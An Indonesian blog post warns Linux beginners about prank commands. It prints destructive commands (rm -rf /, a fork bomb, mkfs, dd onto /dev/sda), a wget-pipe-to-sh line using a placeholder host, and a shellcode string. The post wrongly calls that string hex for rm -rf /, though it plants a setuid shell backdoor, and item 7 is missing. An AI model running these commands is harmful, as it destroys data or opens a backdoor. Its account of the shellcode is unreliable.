Post Top Info

Post Top Info

linuxubuntu

9 Perintah Mematikan Yang Jangan Pernah Anda Jalankan Pada Linux..!!

Baris perintah pada sistem operasi berbasis linux seperti Ubuntu, Linux Mint, Debian, Centos dlsb sangat powerfull dan sakti mandraguna. Menjalankan perintah-perintah dasar memang relatif tidak membahayakan bagi sistem anda, namun dengan penambahan sedikit saja perintah maka perintah-perintah dasar tersebut dapat berubah menjadi monster yang dapat merusak dan melenyapkan seluruh sistem anda.

ilustrasi


Bagi anda yang masih pemula atau masih belajar sistem operasi open source yang satu ini memang seharusnya tidak sembarangan dalam mengeksekusi sebuah perintah. Apalagi perintah tersebut berasal dari sumber yang tidak kredibel dan tidak jelas. Bisa saja perintah-perintah tersebut merupakan perintah mematikan yang sengaja disebar kepada para pemula untuk sekedar bahan lelucon dan menertawakan keluguan kita-kita yang masih belajar linux.

Agar anda tidak terjebak oleh orang-orang jahil seperti ini, maka anda perlu mengetahui perintah-perintah linux yang mematikan. seberapa mematikan..?? yah cukup untuk melenyapkan sistem dan data anda yang tersimpan didalamnya. Horor sekali bukan..??. Jika anda di suruh untuk menjalankan salah satu dari ke 9 perintah ini oleh teman atau seseorang diinternet maka hampir dapat dipastikan anda mau dikerjai. Waspadalah…

Catatan : Pada sistem operasi ubuntu perintah-perintah dibawah ini hanya berbahaya jika di jalankan menggunakan perintah sudo. misal sudo rm -rf /, sudo :(){ :|: & };: dan lainnya. Untuk distribusi linux lainnya perintah-perintah dibawah ini hanya akan bekerja jika dijalankan sebagai root atau menggunakan user root.


1. rm -rf / (Hapus Semuanya..!!!)

Perintah rm -rf / atau jika di ubuntu ditambahkan sudo menjadi sudo rm -rf / SANGAT BERBAHAYA. Mengapa berbahaya..??? meskipun perintahnya cuma seupil (cuma 8 karakter termasuk spasi) tapi fungsinya itu loh….perintah rm -rf / akan menghapus semua file dan data yang ada di komputer anda, termasuk semua data dalam hard disk, CD/DVD Rom dan semua perangkat portabel yang tercolok di komputer anda seperti hard disk portable, USB Flash Disk, SD Card, dlsb. Serem kan…??

Berikut penjelasan dari perintah diatas :

  • rm : merupakan perintah linux untuk menghapus file
  • -rf : singkatan dari Recursive – Force. merupakan opsi dari perintah rm yang berfungsi untuk menghapus semua file, folder dan sub folder yang ada didalamnya tanpa sisa serta memaksa operasi penghapusan file tanpa memberikan peringatan apapun kepada anda.
  • / : memberitahukan kepada rm untuk menghapus file dan folder yang berada dibawah direktori root, seperti yang kita tahu direktori root dilambangkan sebagai / , dan semua file, folder atau data yang ada di komputer anda berada dibawah direktori ini. menghapus direktori root artinya menghapus semua file, folder atau data yang ada dikomputer anda tanpa terkecuali.

linux akan dengan senang hati menjalankan perintah ini tanpa banyak tanya. Jadi sebaiknya berhati-hati, perintah-perintah sejenis yang sama bahayanya adalah rm -rf ~ (menghapus semau file home anda) dan rm -rf .* yang akan menghapus semua file konfigurasi anda.

TIPS : Hati-hati dengan perintah rm -rf , jangan sembarangan eksekusi perintah ini jika anda tidak tahu apa yang sedang anda lakukan.


2. Penyamaran rm -rf

Hati-hati juga dengan kode perintah seperti dibawah ini :

char esp[] __attribute__ ((section(“.text”))) /* e.s.prelease */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″“\x6e\x2f\x73\x68\x00\x2d\x63\x00″“cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;”;

Jangan menjalankan kode aneh diatas, kode tersebut bukan virus atau malware namun versi hex dari perintah rm -rf/ , menjalankan kode diatas sama saja dengan anda menjalankan perintah rm -rf yang akan menghapus seluruh data yang ada di hard disk dan removable disk seperti UFD, HDD Portable, CD/DVD pokoknya semua data anda hilang dibuatnya.

TIPS : Jangan pernah menjalankan kode aneh jika anda tidak tahu apa yang sedang anda lakukan.


3. :(){ :|: & };: ( Perintah Imut Nan Berbahaya! )

Apa yang anda fikirkan ketika disuruh mengetikan perintah :(){ :|: & };: pada terminal (jika di ubuntu sudo :(){ :|: & };: ). Perintah iseng yang akan menampilkan easter egg atau fitur tersembunyi linux yang menyenangkan..?? perintah iseng untuk menampilkan animasi sederhana pada linux..?? semua anggapan menyenangkan tersebut salah besar!

Pada kenyataannya perintah :(){ :|: & };: atau yang dikenal dengan istilah Fork Bomb. merupakan sebuah bash script yang berfungsi untuk menggandakan dirinya sendiri, file hasil penggandaan tersebut kemudian akan kembali menggandakan diri, file hasil penggandaan penggandaan tersebut akan kembali menggandakan diri begitu seterusnya tanpa henti. akibat yang ditimbulkan..?? resource komputer anda akan jebol, komputer akan hang! karena nggak kuat menahan beban.

ilustrasi fork bomb

perintah ini mirip dengan prinsip serangan DDoS yang sangat populer didunia hacking.

TIPS : Hati-hati terhadap segala jenis bash script, meskipun untuk perintah yang sangat mungil dan simpel.


4. mkfs.ext4 /dev/sda1 (Format Hard Disk!)

perintah mkfs.ext4 /dev/sda1 terdiri dari dua bagian yang bisa dijelaskan sebagai berikut :

  • mkfs.ext4 : Perintah ini berfungsi untuk membuat format ext4 pada drive yang bersangkutan. ext4 merupakan format standar hard drive pada linux, yah seperti ntfs pada windows gitu deh..
  • /dev/sda1 : Perintah ini menunjukan lokasi partisi atau drive pertama pada hard disk anda, umumnya partisi ini digunakan sebagai tempat instalasi linux

Jika keduanya digabungkan menjadi perintah mkfs.ext4 /dev/sda1 maka yang terjadi adalah partisi pertama pada hardisk anda akan di format kedalam format ext4 yang berarti hilangnya semua data yang terdapat pada partisi pertama anda. hal ini sama halnya dengan anda memformat drive C:\ komputer Windows anda.

variasi dari perintah ini adalah mksfs.ext2 /dev/sdb2, mkfs.ext3 /dev/sda2 dlsb. dimana ext2, ext3 dst merupakan format dari drive anda sedangkan sda dan sdb menunjukan hardisk pertama dan hardisk kedua anda.

Tips : Hati-hati menggunakan perintah yang berhubungan langsung dengan drive anda. pastikan anda mengenali perintah tersebut.


 5. command > /dev/sda (Menulis Perintah Langsung Pada Partisi)

ilustrasi

Perintah command > /dev/sda juga sama bahayanya dengan perintah nomor 4 diatas, perintah ini bertujuan untuk menuliskan perintah dan hasil perintah langsung pada partisi yang bersangkutan. efeknya..?? Data anda bisa hilang atau rusak dibuatnya.

  • command : command disini maksudnya bukan ditulis command gitu tapi berupa sebuah perintah bisa perintah rm, cp, cd, dan perintah-perintah lainnya
  • > : Mengirimkan Output perintah pada partisi atau drive yang bersangkutan.
  • /dev/sda : menulis output perintah pada hard drive yang bersangkutan secara langsung.

Tips : Hati-hati menggunakan perintah yang berhubungan langsung dengan drive anda (ada unsur /dev/sda, /dev/sdb dlsb). pastikan anda mengenali perintah tersebut.


6. dd if=/dev/random of=/dev/sda (Membanjiri Hard Drive Dengan Sampah )

perintah dd if=/dev/random of=/dev/sda atau variasinya dd if=/dev/random of=/dev/sda1, dd if=/dev/random of=/dev/sdb dlsb. Perintah ini akan menghapus data anda dan menggantinya dengan data sampah.

  • dd : perintah untuk melakukan low-level copying dari satu lokasi ke lokasi lainnya.
  • if=/dev/random : Menggunakan data dari drive secara acak sebagai input-nya, variasi dari bagian ini adalah /dev/zero.
  • of=/dev/sda : Output perintah akan ditulis pada hardisk utama anda. File sistem anda akan di overwrite dengan data sampah secara acak.

Tips : dd merupakan perintah untuk memindahkan data dari satu lokasi ke lokasi lainnya, jika anda menggunakan perintah dd secara langsung ke sebuah device maka akan dapat membahayakan data yang terdapat didalamnya.


8. mv ~ /dev/null (Memindahkan Direktori Home Anda Ke Antah Barantah )

ilustrasi

/dev/null merupakan lokasi “antah barantah” pada sistem linux, memindahkan data ke /dev/null sama artinya dengan melenyapkan data tersebut untuk selamanya. Lokasi /dev/null ini dapat kita ibaratkan sebagai black hole atau lubang hitam yang akan menyedot semuanya tanpa bisa di ambil kembali.

  • mv : Perintah Move atau kalau di Windows kita mengenalnya dengan istilah cut, sebuah operasi yang akan memindahkan data dari satu lokasi ke lokasi lainnya.
  • ~ : Direktori Home linux anda, semua data personal anda biasanya secara default akan disimpan didirektori ini.
  • /dev/null : lubang hitam atau dunia “antah barantah”, sebuah lokasi yang keberadaannya tidak valid. memindahkan file ke lokasi ini akan melenyapkan data anda dan menghapus file aslinya.

Tips : jangan sekali-kali terkecoh dengan memindahkan data ke direktori /dev/null karena itu sama artinya dengan melenyapkan data anda untuk selamanya..


9. wget http://webcontoh.com/sesuatu -O – | sh – (Mendownload “Sesuatu” dan menjalankannya sebagai script.

Anda patut berhati-hati jika mendapatkan  perintah wget http://webcontoh.com/sesuatu -O – | sh – karena perintah ini artinya anda mendownload “sesuatu” dari website webcontoh.com dan menjalankannya sebagai script. Jika perintah ini berasal dari sumber yang nggak jelas maka anda perlu hati-hati, karena anda nggak tahu kan “sesuatu” tersebut apaan..?? apalagi jika “sesuatu” tersebut asalnya dari sumber yang nggak jelas hiii…serem ah..

Jika anda ingin belajar lebih jauh tentang perintah wget anda bisa membaca artikel Download File Menggunakan Baris Perintah Wget

  • wget : Perintah untuk mendownload file, variasinya adalah curl
  • http://webcontoh.com/sesuatu : url contoh untuk mendownload “sesuatu”, bisa saja anda nanti menemukan http://websitevirus/scriptvirus misalnya.
  • | : perintah pipe berfungsi untuk mengirimkan output dari perintah wget (dalam hal ini file yang anda download ) ke perintah berikutnya.
  • sh : perintah untuk mengeksekusi bash script.

Tips : Jangan download dan menjalankan sembarang script dari website yang tidak terpercaya.

Itu dia 9 perintah mematikan yang sebaiknya tidak pernah anda coba pada komputer utama anda. anda boleh mempraktekan perintah-perintah diatas sebagai bahan pembelajaran, tapi lakukanlah pada komputer virtual menggunakan virtual box dan jangan lupa untuk membackup terlebih dahulu semua data anda.

Kerusakan dan kehilangan data akibat mempraktekan perintah diatas bukan menjadi tanggung jawab localhost/eridesktop, selamat mencoba..:). Jika ada istilah-istilah yang membingungkan pada artikel ini mungkin anda harus membaca Kenali Istilah-Istilah Dasar Linux terlebih dahulu.

Semoga Bermanfaat ya..

Related Posts

Tidak ada komentar:

Posting Komentar